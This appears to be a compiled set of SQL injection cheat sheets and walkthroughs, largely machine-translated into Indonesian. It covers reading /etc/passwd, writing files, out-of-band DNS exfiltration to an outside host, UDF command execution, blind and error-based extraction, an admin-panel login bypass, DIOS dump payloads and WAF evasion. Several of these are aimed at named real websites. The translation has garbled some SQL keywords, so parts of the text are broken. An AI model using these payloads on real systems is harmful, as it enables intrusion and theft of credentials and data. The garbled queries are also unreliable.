  2178. SELECT LOAD_FILE('/etc/passwd')
  2179. Write File(s):
  2180. #You must use quotes on the filename!
  2181. SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
  2182. SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hel
  2183. Logical Operator(s):
  2184. AND, &&; #The AND operator have && as an alternative syntax.
  2185. OR, ||; #The OR operator have || as an alternative syntax.
  2186. NOT, !; #The NOT operator have ! as an alternative syntax.
  2187. XOR; #The XOR operator got no alternative syntax.
  2188. Fuzzy Code Comment:
  2189. #Code within /*! are getting executed by MySQL. Additional /*! can be
  2190. SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/
  2191. Comments:
  2192. SELECT foo, bar FROM foo.bar-- Single line comment
  2193. SELECT foo, bar FROM foo.bar/* Multi line comment */
  2194. SELECT foo, bar FROM foo.bar# Single line comment
  2195. SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-
  2196. A few evasions/methods to use between your MySQL statements:
  2197. CR (%0D); #Carrier Return.
  2198. LF (%0A); #Line Feed.
  2199. Tab (%09); #The Tab-key.
  2200. Space (%20); #Most commonly used. You know what a space is.
  2201. Multiline Comment (/**/); #Well, as the name says.
  2202. Fuzzy Comment (/*!); #Be sure to end your query with (*/)
  2203. Parenthesis, ( and ); #Can also be used as separators when used right
  2204. Parenthesis instead of space:
  2205. #As said two lines above, the use of parenthesis can be used as a sep
  2206. SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))
  2207. Auto-Casting to Right Collation:
  2208. SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s)
  2209. DNS Requests (OOB (Out-Of-Band)):
  2210. #For more information check this.
  2211. SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_a
  2212. Command Execution:
  2213. #If you're on a MySQL 4.X server, it's possible to execute OS comman
  2214. #It can be done if you're able to upload a shared object into /usr/
  2215. #The file extension is .so, and it must contain an "User Defined Fun
  2216. #Get raptor_udf.c, it's the source-code for just that feature.
  2217. #Remember to compile it for the right CPU Architecture.
  2218. #The CPU architecture can be resolved by this query:
  2219. SELECT @@version_machine;
  2220. <blockquote>A couple of useful blind queries to fingerprint the data
  2221. All of these return either True or False, as in, you either get a res
  2222. SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53;
  2223. SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52
  2224. Running as root:
  2225. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=U
  2226. Got File_priv:
  2227. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user
  2228. (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
  2229. (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
  2230. (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
  2231. LIMIT 0,1)=CHAR(89),1,0)=1
  2232. Got Super_priv (Are we DBA):
  2233. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql
  2234. (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
  2235. (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
  2236. (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
  2237. LIMIT 0,1)=CHAR(89),1,0)=1
  2238. Can MySQL Sleep:
  2239. #This query will return True and should take above 1 second to execut
  2240. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
  2241. Can MySQL Benchmark:
  2242. SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1
  2243. Are we on *NIX:
  2244. SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47
  2245. Are we on Windows:
  2246. SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=
  2247. Do a certain column exist:
  2248. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information
  2249. Do a certain table exist:
  2250. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
  2251. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
  2252. Do a certain database exist:
  2253. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
  2254. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
  2255. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information
  2256. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db
  2257. from:h.ackack(dot)net
  2258.  
  2259. Credits to owner :*
  2260. thanks
  2261.  
  2262. INJEKSI MSSQL MENGGUNAKAN KONVERSI
  2263.  
  2264. Kita mendapat target dan mari kita periksa apakah itu Rentan untuk disuntikkan. Jadi kita akan Jalankan URL dengan Menambahkan Kutipan Tunggal "'" di Akhir Jika Parameter Target.
  2265. http://www.Vuln-Site.com/authorprofile.asp?id=46 '
  2266. Ini Memberi Kita Kesalahan
  2267.  
  2268. KESALAHAN:
  2269. Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e14'
  2270. [Microsoft] [ODBC SQL Server Driver] [SQL Server] Tanda kutip uncomposed setelah string karakter ''.
  2271. /authorprofile.asp, baris 10
  2272.  
  2273. Situs Target kami adalah Rentan. Seperti kita Suntik dengan Serangan Konversikan Jadi kita tidak perlu Pergi Untuk Menghitung Jumlah Kolom Total. Kami akan langsung mengeksekusi Perintah kami dengan Konversi.
  2274. Mari Periksa Versi.
  2275. http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = konversi (int, @@ version) -
  2276. Setelah Melaksanakan Permintaan Kami Mendapat Versi.
  2277.  
  2278. Berikut ini adalah Versi: Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Hak cipta (c) Microsoft Corporation Web Edition (64-bit) pada Windows NT 6.1 <X64> (Build 7601: Paket Layanan 1 )
  2279. Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
  2280. [Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal saat mengkonversi nilai nvarchar 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Hak Cipta (c) Microsoft Corporation Web Edition (64 -bit) pada Windows NT 6.1 <X64> (Build 7601: Service Pack 1) 'ke tipe data int.
  2281. /authorprofile.asp, baris 10
  2282.  
  2283. Sekarang, mari kita periksa nama database saat ini.
  2284. http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = konversi (int, db_name ()) -
  2285. Dan kami sudah mendapat nama database saat ini.
  2286.  
  2287. Ini adalah Nama Database Saat Ini: museindia
  2288. Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
  2289. [Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal ketika mengkonversi nilai nvarchar 'museindia' ke tipe data int.
  2290. /authorprofile.asp, baris 10
  2291.  
  2292. Seperti yang telah kita dapatkan Versi dan nama Database. Sekarang, mari kita pindah ke Getting The Tables.
  2293. Ini adalah pertanyaan kami untuk mendapatkan tabel.
  2294. http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 table_name dari information_schema.tables)) - +
  2295. Setelah Melaksanakan Kueri, Kita Mendapat Nama Tabel Pertama.
  2296.  
  2297. Nama tabel: tentang
  2298. Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
  2299. [Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal ketika mengkonversi nilai nvarchar 'about' ke int tipe data.
  2300. /authorprofile.asp, baris 10
  2301. Untuk Mendapatkan Tabel Lain dari Database, kita akan menambahkan nama Tabel Sebelumnya Terlampir Dengan Kutipan Tunggal dengan Tanda Kecil.
  2302. Sebagai contoh:
  2303. dan 1 = convert (int, (pilih top 1 table_name dari information_schema.tables di mana table_name tidak di ('OUR_PREVIOUS_TABLE_NAME_1', 'OUR_PREVIOUS_TABLE_NAME_2'))) - +
  2304. Jadi Mari Periksa Tabel Lainnya dari Basis Data.
  2305. http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 table_name dari information_schema.tables di mana table_name tidak di ('about'))) - +
  2306. Dan Kami Punya Nama Meja Berikutnya.
  2307.  
  2308. Nama Tabel Berikutnya: aucon
  2309. Penyedia Microsoft OLE DB untuk ODBC Drivers error '80040e07'
  2310. [Microsoft] [ODBC SQL Server Driver] [SQL Server] Konversi gagal ketika mengkonversi nilai nvarchar 'aucon' ke tipe data int.
  2311. /authorprofile.asp, baris 10
  2312. Dengan cara ini kita akan Terus Mendapatkan tabel Lainnya sampai mendapatkan Tabel yang Diperlukan.
  2313. Di sini kita Mendapat nama Tabel: anggota
  2314. Sekarang mari Dapatkan nama Kolom dari Tabel ini.
  2315. http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 column_name dari information_schema.columns di mana table_name = 'members')) - +
  2316. kami telah mendapat nama Kolom Pertama.
  2317.  
  2318. Ini adalah First Column Name: memberid
  2319. Mari mencoba mendapatkan Kolom lainnya seperti yang kita lakukan untuk mendapatkan tabel lain dari database.
  2320.  
  2321. http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = convert (int, (pilih top 1 column_name dari information_schema.columns di mana table_name = 'members' dan column_name tidak di ('memberid') )) - +
  2322. Jadi Setelah Mendapatkan nama Kolom Bagian Terakhir adalah Untuk Mengekstrak Data dari Kolom.
  2323. Ini akan menjadi Pertanyaan Akhir Kita!
  2324. http://www.Vuln-Site.com/authorprofile.asp?id=46 dan 1 = konversi (int, (pilih top 1 OUR_COLUMN_NAME _DI SINI dari OUR_TABLE_NAME_HERE)) - +
  2325. Kueri ini akan Mencetak Data dari Kolom di WebPage.
  2326.  
  2327. -h
  2328.  
  2329. Mem-bypass Login Panel dengan SQL Queries
  2330.  
  2331. http://trentglobal.com/admin
  2332.  
  2333. Kita dapat menggunakan Live HTTP Headers atau Hackbar untuk Post Parameters Injection jadi saya akan Menggunakan Hackbar Untuk Proses ini.
  2334. Sekarang Mari Sisipkan Beberapa Teks dalam kotak nama pengguna dan kata sandi. Setelah Memasukkan Teks Klik pada Tombol LOGIN. Kemudian Aktifkan Data Posting di Hackbar untuk Pelaksanaan Parameter Posting Kita.
  2335.  
  2336. Sekarang Klik LOAD URL Button di Hackbar untuk mendapatkan Parameter POST dalam kotak POST DATA di Hackbar Addon. Di sana kami akan memberikan pertanyaan SQL Injection.
  2337.  
  2338. Ini memberi kami Nama Pengguna dan Kata Sandi yang tidak valid tetapi Anda dapat Melihat Data Pos di Addon Peretasan.
  2339. Berikut adalah Parameter Posting Kami uname = harhar & pwd = 123456 & log_submit = Login
  2340. ayo tambahkan Single Quote setelah uname = harhar 'untuk memeriksa kerentanan SQLi. Dan kemudian Execute the Query.
  2341.  
  2342. Ini Rawan terhadap SQL Injection. Selanjutnya kita akan mengeksekusi Query SQL Berbasis STRING untuk Penyuntikan Lebih Lanjut.
  2343. Sekarang Mari Hitung berapa Banyak Kolom yang ada.
  2344. Jadi Kami akan Berikan Perintah Kami Untuk menghitung Kolom di Parameter Pasca dengan Hackbar.
  2345. order uname = harharharhar sebesar 2% 23
  2346. No Error !!
  2347.  
  2348. uname = 'pesanan sebesar 3% 23
  2349. No Error !!
  2350.  
  2351. order uname = harhar 'sebesar 4% 23
  2352. No Error !!
  2353.  
  2354. uname = 'pesanan sebesar 5% 23
  2355.  
  2356. Kami Punya Kesalahan !! Kolom tidak dikenal '5' di 'klausa pesanan'
  2357. Berarti Ada 4 Jumlah Kolom Total.
  2358. Hmmm Sekarang Mari Jalankan perintah UNION SELECT kami dengan 4 jumlah Kolom.
  2359.  
  2360. BinGOOOO !! Panel Admin Dilewati. Kita sudah mendapat Akses ke Panel Admin Tanpa menggunakan Nama Pengguna atau Kata Sandi dari pengguna Admin.
  2361.  
  2362. -h
  2363. Playing with DIOS #1
  2364.  
  2365. task & rules
  2366. ¤display version with your name
  2367. ¤display count how many column names start with characters id_
  2368. ¤display list of columns (with their database and table name) where column names start with characters id_
  2369.  
  2370. Solution:
  2371.  
  2372. http:p//vuln.net/produit.ph p?id=55 and 0 UNION%0aSELECT 1,2,3,concat(0x3c2f7469746c653e,version(),0x203a3a2050682e683472683472,0x3c42523e,0x6e756d626572206f6620636f6c756d6e73207374617274696e6720776974682069645f2069733a20,count(*),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and((column_name)like(0x69645f25))and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2d2d3e,table_name,0x2d2d3e,column_name))))x),0x3c7469746c653e),5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23 from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f73 6368656d61)and(column_name)like(0x69645f25)--
  2373.  
  2374. ©MasterAjkaro
  2375. -h
  2376.  
  2377. Playing with DIOS #2
  2378.  
  2379. Task & rules
  2380. ¤display version with your name
  2381. ¤display total number of databases
  2382. ¤display total number of tables (without those in information_schema)
  2383. ¤display all table names (excluding those from information_schema) and columns count for each table
  2384.  
  2385. solution......
  2386.  
  2387. http://www.vuln.fr/pages /produit.php?id=55 and 0 UNION SELECT 1,2,3,4,5,6,7,8,9,concat(0x3c62723e,version(),0x3a3a2050682e683472683472,0x3c62723e746f74616c206e756d626572206f66206461746162617365733a20,(select count(*) %0Afrom information_schema.schemata),
  2388. 0x3c62723e746f74616c206e756d626572206f66207461626c657320696e206461746162617365732028776974686f757420696e666f726d6174696f6e5f736368656d61293a20,(select count(*) %0afrom information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61),
  2389. (select(@x)%0afrom(select(@x:=0x00),(select(0)%0afrom(information_schema.tables)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in
  2390. (@x:=concat(@x,0x3c62723e,0x7461626c653a20,@tbl:=table_name,
  2391. 0x202d2d3e20636f6c756d6e733a20,(select(count(*))%0Afrom(information_schema.columns)where(table_name=@tbl))x)
  2392. ),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- -
  2393.  
  2394. ©Master Akjkaro
  2395. ~h
  2396.  
  2397. Playing with DIOS #3
  2398.  
  2399. Task & rules
  2400. ¤display version with your name
  2401. ¤display all tables in primary database with records count for each table
  2402.  
  2403. solution....
  2404.  
  2405. http://www.vuln.com /product.php?c=11) and 0 UNION SELECT 1,concat
  2406. (version(),0x50682e683472683472,(select (@x) from (select (@x:=0x00),(select(0)from(information_schema.tables)where(table_schema=database()) and (0x00) in
  2407. (@x:=concat(@x,0x3c62723e,@tbl:=table_name,0x202d2d3e207265636f72647320696e207461626c653a20,(select table_rows from information_schema.tables where table_schema=Database() and table_name=@tbl))x)),3,4,5,6,7,8
  2408.  
  2409. ©Master Ajkaro
  2410. -h
  2411.  
  2412. MSSQL DIOS
  2413.  
  2414. ¤1¤
  2415. ==========================
  2416. http://www.aiou.edu.pk/Programmes.asp?PID=74;begin declare @x varchar(8000),@y int,@z varchar(50),@a varchar(100) declare @myTbl table (name varchar(8000) not null)SET @y=1 SET @x='injected by Me :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl)select @a=@a %2b column_name%2b' : '
  2417. from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2bCHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%
  2418. 2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)SET @y = @y%2b1 end select @x as output into diosku END--
  2419.  
  2420. ¤2¤
  2421. ==========================
  2422. http://www.aiou.edu.pk/Programmes.asp?PID=74%20and%200%3D1%20UNION%20SELECT%2b1%2Coutput%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%20from%20diosku--
  2423.  
  2424. ¤3¤
  2425. ==========================
  2426. http://www.aiou.edu.pk/Programmes.asp?PID=74;DROP TABLE diosku--
  2427.  
  2428. ==========================
  2429. ©securityidiots
  2430. -rkx
  2431.  
  2432. The Error Connection Was Reset
  2433.  
  2434. Query :
  2435.  
  2436. id=.1union-- a%0Aselect
  2437. id=1-.1union- a%0Aselect
  2438. id=1'e0union- a%0Aselect
  2439. id=\Nunion- a%0Aselect
  2440. id=1 *9e0union-- -%0aselect
  2441.  
  2442. Please Like and Share our Page :*
  2443.  
  2444. -h
  2445.  
  2446. Hari ini saya akan menunjukkan kepada Anda cara mem-bypass Web Application Firewalls (WAF). Saya akan mendemonstrasikan dari Teknik-Teknik Dasar dan Paling Sederhana ke yang Paling Mahir!
  2447.  
  2448. CATATAN: Jika Anda tidak tahu SQL Injection, baca ini dulu ...
  2449.  
  2450. Apa itu WAF?
  2451.  
  2452. WAF adalah singkatan dari Firewall Aplikasi Web. Hal ini banyak digunakan saat ini untuk mendeteksi dan mempertahankan Suntikan SQL!
  2453.  
  2454. Mari kita mulai!
  2455.  
  2456. Bagaimana cara mengetahui apakah Firewall Aplikasi Web?
  2457.  
  2458. Ini sangat sederhana! Ketika Anda mencoba memasukkan perintah yang digunakan untuk SQL Injections (biasanya perintah "UNION SELECT"), Anda mendapatkan 403 Error (dan situs web mengatakan "Forbidden" atau "Tidak Dapat Diterima").
  2459. Contoh:
  2460.  
  2461. http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
  2462. (Kami mendapatkan kesalahan 403!)
  2463. Metode Dasar / Sederhana:
  2464.  
  2465. Pertama, tentu saja, kita perlu mengetahui Metode Dasar untuk mem-bypass WAF…
  2466.  
  2467. 1) Komentar:
  2468. Anda dapat menggunakan komentar untuk mem-bypass WAF:
  2469.  
  2470. http://www.site.com/index.php?page_id=-15 / *! UNION * / / *! SELECT * / 1,2,3,4….
  2471. (Metode Pertama yang Dapat Menembus WAF)
  2472.  
  2473. Namun, sebagian besar WAF mengidentifikasi metode ini sehingga mereka masih menunjukkan "Forbidden" Error…
  2474.  
  2475. 2) Ubah Kasus Huruf:
  2476. Anda juga dapat mengubah Kasus Perintah:
  2477.  
  2478. http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
  2479. (Metode Dasar Lain untuk Menghindari WAF!)
  2480.  
  2481. Namun, seperti sebelumnya, trik ini juga terdeteksi oleh kebanyakan WAF!
  2482.  
  2483. 3) Gabungkan Metode sebelumnya:
  2484. Yang dapat Anda lakukan adalah menggabungkan dua metode sebelumnya:
  2485.  
  2486. http://www.site.com/index.php?page_id=-15 / *! uNIOn * / / *! SelECt * / 1,2,3,4….
  2487.  
  2488. Metode ini tidak dapat dideteksi oleh banyak Firewall Aplikasi Web!
  2489. 4) Kata Kunci yang Diganti:
  2490. Beberapa Firewall menghapus Pernyataan "UNION SELECT" ketika ditemukan di URL ... Kita dapat melakukan ini untuk mengeksploitasi fungsi ini:
  2491.  
  2492. http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
  2493. (The "union" dan "select" akan dihapus, jadi hasil akhirnya adalah: "UNION SELECT")
  2494.  
  2495. Metode ini tidak berfungsi di SEMUA Firewall, karena hanya sebagian dari mereka yang menghapus perintah "UNION" dan "SELECT" saat terdeteksi!
  2496. 5) Komentar Sejajar:
  2497. Beberapa firewall dilewati dengan Memasukkan Inline Komentar antara "Union" dan "Pilih" Perintah:
  2498.  
  2499. http://www.site.com/index.php?page_id=-15% 55nION / ** /% 53ElecT 1,2,3,4…
  2500. (The% 55 sama dengan "U" dan% 53 sampai "S". Lihat lebih lanjut di Bagian Lanjutan ....)
  2501.  
  2502. Saya percaya bahwa ini adalah metode paling dasar untuk WAF Bypassing! Mari kita lanjutkan dengan yang lebih maju ...
  2503. Metode Lanjutan:
  2504.  
  2505. Sekarang Anda telah belajar tentang Basic WAF Bypassing, saya pikir itu baik untuk memahami Metode yang lebih maju!
  2506.  
  2507. 1) Buffer Overflow / Firewall Crash:
  2508. Banyak Firewall dikembangkan dalam C / C ++ dan kita dapat Crash mereka menggunakan Buffer Overflow!
  2509.  
  2510. http://www.site.com/index.php?page_id=-15+and+(select 1) = (Pilih 0xAA [.. (tambahkan sekitar 1000 "A") ..]) + / *! uNIOn * / + / *! SeLECt * / + 1,2,3,4….
  2511.  
  2512. ((Anda dapat menguji apakah WAF dapat dihancurkan dengan mengetik:
  2513. ? page_id = null% 0A / ** // *! 50000% 55nIOn * // * yoyu * / all / ** /% 0A / *!% 53eLEct * /% 0A / * nnaa * / + 1,2,3 , 4….
  2514.  
  2515. Jika Anda mendapatkan 500, Anda dapat memanfaatkannya menggunakan Metode Buffer Overflow! ))
  2516.  
  2517. 2) Ganti Karakter dengan Nilai HEX mereka:
  2518. Kita dapat mengganti beberapa karakter dengan Nilai HEX (URL-Encoded) mereka.
  2519. Contoh:
  2520.  
  2521. http://www.site.com/index.php?page_id=-15 / *! u% 6eion * / / *! se% 6cect * / 1,2,3,4….
  2522. (yang berarti "memilih serikat")
  2523.  
  2524. Teks ke Hex Encoder (Pilih hasil “Hex Encoded for URL”!): Http://www.swingnote.com/tools/texttohex.php
  2525.  
  2526. 3) Gunakan Variabel atau Perintah lain, bukan yang umum untuk SQLi:
  2527. Terlepas dari "UNION SELECT", perintah lain mungkin diblokir.
  2528. Perintah Umum Diblokir:
  2529. COMMAND | APA YANG HARUS DIGUNAKAN BUKAN
  2530. @@ versi | versi()
  2531. concat () | concat_ws () -> Perbedaan antara concat () dan concat_ws (): http://is.gd/VEeiDU
  2532. group_concat () | concat_ws ()
  2533.  
  2534. Belajar MySQL Sangat membantu dalam masalah seperti itu!
  2535.  
  2536. 4) Misc Exploitable Functions:
  2537. Banyak firewall mencoba menawarkan lebih banyak Perlindungan dengan menambahkan Fungsi Prototipe atau Aneh! (Yang, tentu saja, bisa kita manfaatkan!):
  2538. Contoh:
  2539.  
  2540. Firewall ini di bawah menggantikan "*" (tanda bintang) dengan Whitespaces! Apa yang bisa kita lakukan adalah ini:
  2541.  
  2542. http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4&#8230;
  2543.  
  2544. (Jika Firewall menghapus "*", hasilnya akan menjadi: 15 + union + pilih ....)
  2545. Jadi, jika Anda menemukan fungsi konyol seperti itu, Anda dapat memanfaatkannya, dengan cara ini!
  2546.  
  2547. [+] Selain contoh sebelumnya, beberapa jalan pintas lain mungkin:
  2548.  
  2549. -15+ (uNioN) + (sElECt)….
  2550.  
  2551. -15+ (uNioN + SeleCT) + ...
  2552.  
  2553. -15+ (UnI) (oN) + (SeL) (ecT) +….
  2554.  
  2555. -15 + union (pilih 1,2,3,4…)
  2556.  
  2557. -h
  2558.  
  2559.  
  2560. Error Based IS Double Query
  2561. Error Based = Double Query (Error based 2x)
  2562.  
  2563. Bagaimana Anda tahu Anda harus menggunakan Error
  2564. Berdasarkan / Double Query? (Penting!)
  2565. Ini adalah bagian terpenting dari peretasan web; itu
  2566. jenis injeksi untuk digunakan dalam situasi yang berbeda.
  2567. Anda dapat menggunakan Injeksi Informasi Berbasis Kesalahan / Ganda
  2568. dalam kesalahan berikut yang Anda dapatkan
  2569. Kode:
  2570. Sebuah. Pernyataan Pilih Terpilih
  2571. Memiliki Jumlah Kolom yang Berbeda.
  2572. b. Kolom Tidak Diketahui 1 atau tidak ada kolom di
  2573. semua (di halaman web dan sumber halaman)
  2574. c.Error # 1604
  2575. Sekarang perhatikan kesalahan-kesalahan itu. Anda akan membutuhkannya.
  2576. versi:
  2577. Pendekatan pertama adalah mengetahui versi dari
  2578. database
  2579. Untuk melakukan itu kami memasukkan permintaan ini setelah akhir
  2580. URL
  2581. www.ddaarchitects.co.uk/click.php?bannerID=%27and(select+min(0)+from+(select+1+a+union+se%C2%ADlect+2)b,(select+1+union + pilih + 2) c + grup + oleh + concat ((pilih + mid (concat (table_nam% C2% ADe, 0x3a, group_concat (column_name)), 1,110) dari + information_schema.columns + di mana + ta% C2% ADble_schema = database () + dan + table_name% 3E '% C2% ADappuser'), masukkan (0x0, a, a, now ()))) - +
  2582.  
  2583. Kode:
  2584. www.exmple.com/show?id=4 atau 1 grup oleh concat_ws (0x3a, versi (), floor (rand (0) * 2)) memiliki min (0) atau 1--
  2585. DATABASE GETTING
  2586. Langkah kedua: Mendapatkan nama database
  2587. Untuk mendapatkan basis data, kami memasukkan kueri ini
  2588. Kode:
  2589. dan (pilih 1 dari (pilih hitungan
  2590. (*), concat ((pilih)
  2591. (cast (database () sebagai char), 0x7e))
  2592. dari information_schema.tables di mana
  2593. table_schema = database () limit
  2594. 0,1), lantai (rand (0) * 2)) x dari
  2595. grup information_schema.tables oleh
  2596. x) a)
  2597. Perhatikan fungsi batas dalam kueri
  2598. Sebuah situs web dapat memiliki lebih dari 2 dua basis data, jadi
  2599. tingkatkan batas hingga Anda menemukan semua nama basis data
  2600. Contoh: membatasi 0,1 atau membatasi 1,1 atau membatasi 2,1
  2601.  
  2602. Langkah Ketiga: Mendapatkan NAMA TABEL
  2603.  
  2604. Nama tabel adalah apa yang kita butuhkan sekarang
  2605. Berikut kueri yang dapat kami gunakan:
  2606. Kode:
  2607. dan (pilih 1 dari (pilih hitungan
  2608. (*), concat ((pilih)
  2609. (cor (table_name sebagai char), 0x7e))
  2610. dari information_schema.tables di mana
  2611. table_schema = database () limit
  2612. 0,1), lantai (rand (0) * 2)) x dari
  2613. grup information_schema.tables oleh
  2614. x) a)
  2615. Jangan juga melupakan fungsi LIMIT yang kami gunakan di sini
  2616. untuk mendapatkan nama tabel satu per satu
  2617. CATATAN:
  2618. Sekarang inilah bagian pentingnya:
  2619. Ketika Anda mencari tabel terus bertambah
  2620. batasi sampai Anda menemukan nama tabel yang berharga
  2621. Misalnya: LIMIT 0,1
  2622. LIMIT 1,1
  2623. BATAS 2,1
  2624. Terus tingkatkan jumlahnya sampai Anda menemukan meja
  2625. Anda ingin mengekstrak informasi dari
  2626. Berikut rumusnya: LIMIT N, 1 di mana N adalah a
  2627. bilangan bulat acak
  2628.  
  2629. Langkah Keempat: Mendapatkan Kolom dari spesifik
  2630. NAMA TABEL
  2631.  
  2632. Baiklah, sekarang Anda telah memilih meja Anda
  2633. ingin mengekstrak kolom dari, waktu untuk mengeksekusi
  2634. pertanyaan lain
  2635. Jadi inilah cara ekstraksi kueri kolom akan terlihat
  2636. seperti:
  2637. Kode:
  2638. dan (pilih 1 dari (pilih hitungan
  2639. (*), concat ((pilih)
  2640. (cast (column_name sebagai char), 0x7e))
  2641. dari information_schema.columns
  2642. di mana table_name = batas 0xTABLEHEX
  2643. 0,1), lantai (rand (0) * 2)) x dari
  2644. grup information_schema.tables oleh
  2645. x) a)
  2646. Perhatikan LIMIT 0,1 FUNCTION dan 0xTABLEHEX
  2647. Anda perlu mengonversi tabel spesifik Anda menjadi hex
  2648. dan tambahkan 0x di awal string sehingga
  2649. dapat dibaca ke situs web
  2650. Untuk mengonversi string menjadi heksadesimal: http: //
  2651. www.swingnote.com/tools/texttohex.php
  2652. CATATAN:
  2653. Anda perlu menaikkan batas sampai Anda menemukan
  2654. kolom berharga seperti userName dan
  2655. kata sandi.
  2656.  
  2657. Langkah Kelima: Mengekstrak data dari Kolom
  2658.  
  2659. Baiklah bagian ini mungkin yang terbaik di SQL
  2660. menyuntikkan situs.
  2661. Saatnya untuk mendapatkan info dari kolom yang kita miliki
  2662. Untuk melakukan itu, gunakan query ini
  2663. Kode:
  2664. dan (pilih 1 dari (pilih hitungan
  2665. (*), concat ((pilih)
  2666. (dilemparkan (concat
  2667. (COLUMN_NAME, 0x7e, COLUMN_NAME) sebagai
  2668. char), 0x7e)) dari
  2669. Batas Databasename.TABLENAME
  2670. 0,1), lantai (rand (0) * 2)) x dari
  2671. grup information_schema.tables oleh
  2672. x) a)
  2673.  
  2674. Atau Anda dapat melakukan (@: = 1) atau @ grup + oleh + concat (versi
  2675. (), @: =! @) + memiliki + mnt (0)
  2676.  
  2677. © LUNATIC
  2678.  
  2679. ~ h
  2680.  
  2681. Comment Name
  2682. -- : MySQL Linux Style
  2683. --+ : MySQL Windows Style
  2684. # : Hash (URL encode while use)
  2685. --+- : SQL Comment
  2686. ;%00 : Null Byte
  2687. ` : Backtick
  2688.  
  2689. Variable/Function Output
  2690. @@hostname : Current Hostname
  2691. @@tmpdir : Tept Directory
  2692. @@datadir : Data Directory
  2693. @@version : Version of DB
  2694. @@basedir : Base Directory
  2695. user() : Current User
  2696. database() : Current Database
  2697. version() : Version
  2698. schema() : current Database
  2699. UUID() : System UUID key
  2700. current_user() : Current User
  2701. current_user : Current User
  2702. system_user() : Current Sustem user
  2703. session_user() : Session user
  2704. @@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
  2705. @@GLOBAL.have_ssl : Check if it have ssl or not
  2706.  
  2707. integer based ::
  2708.  
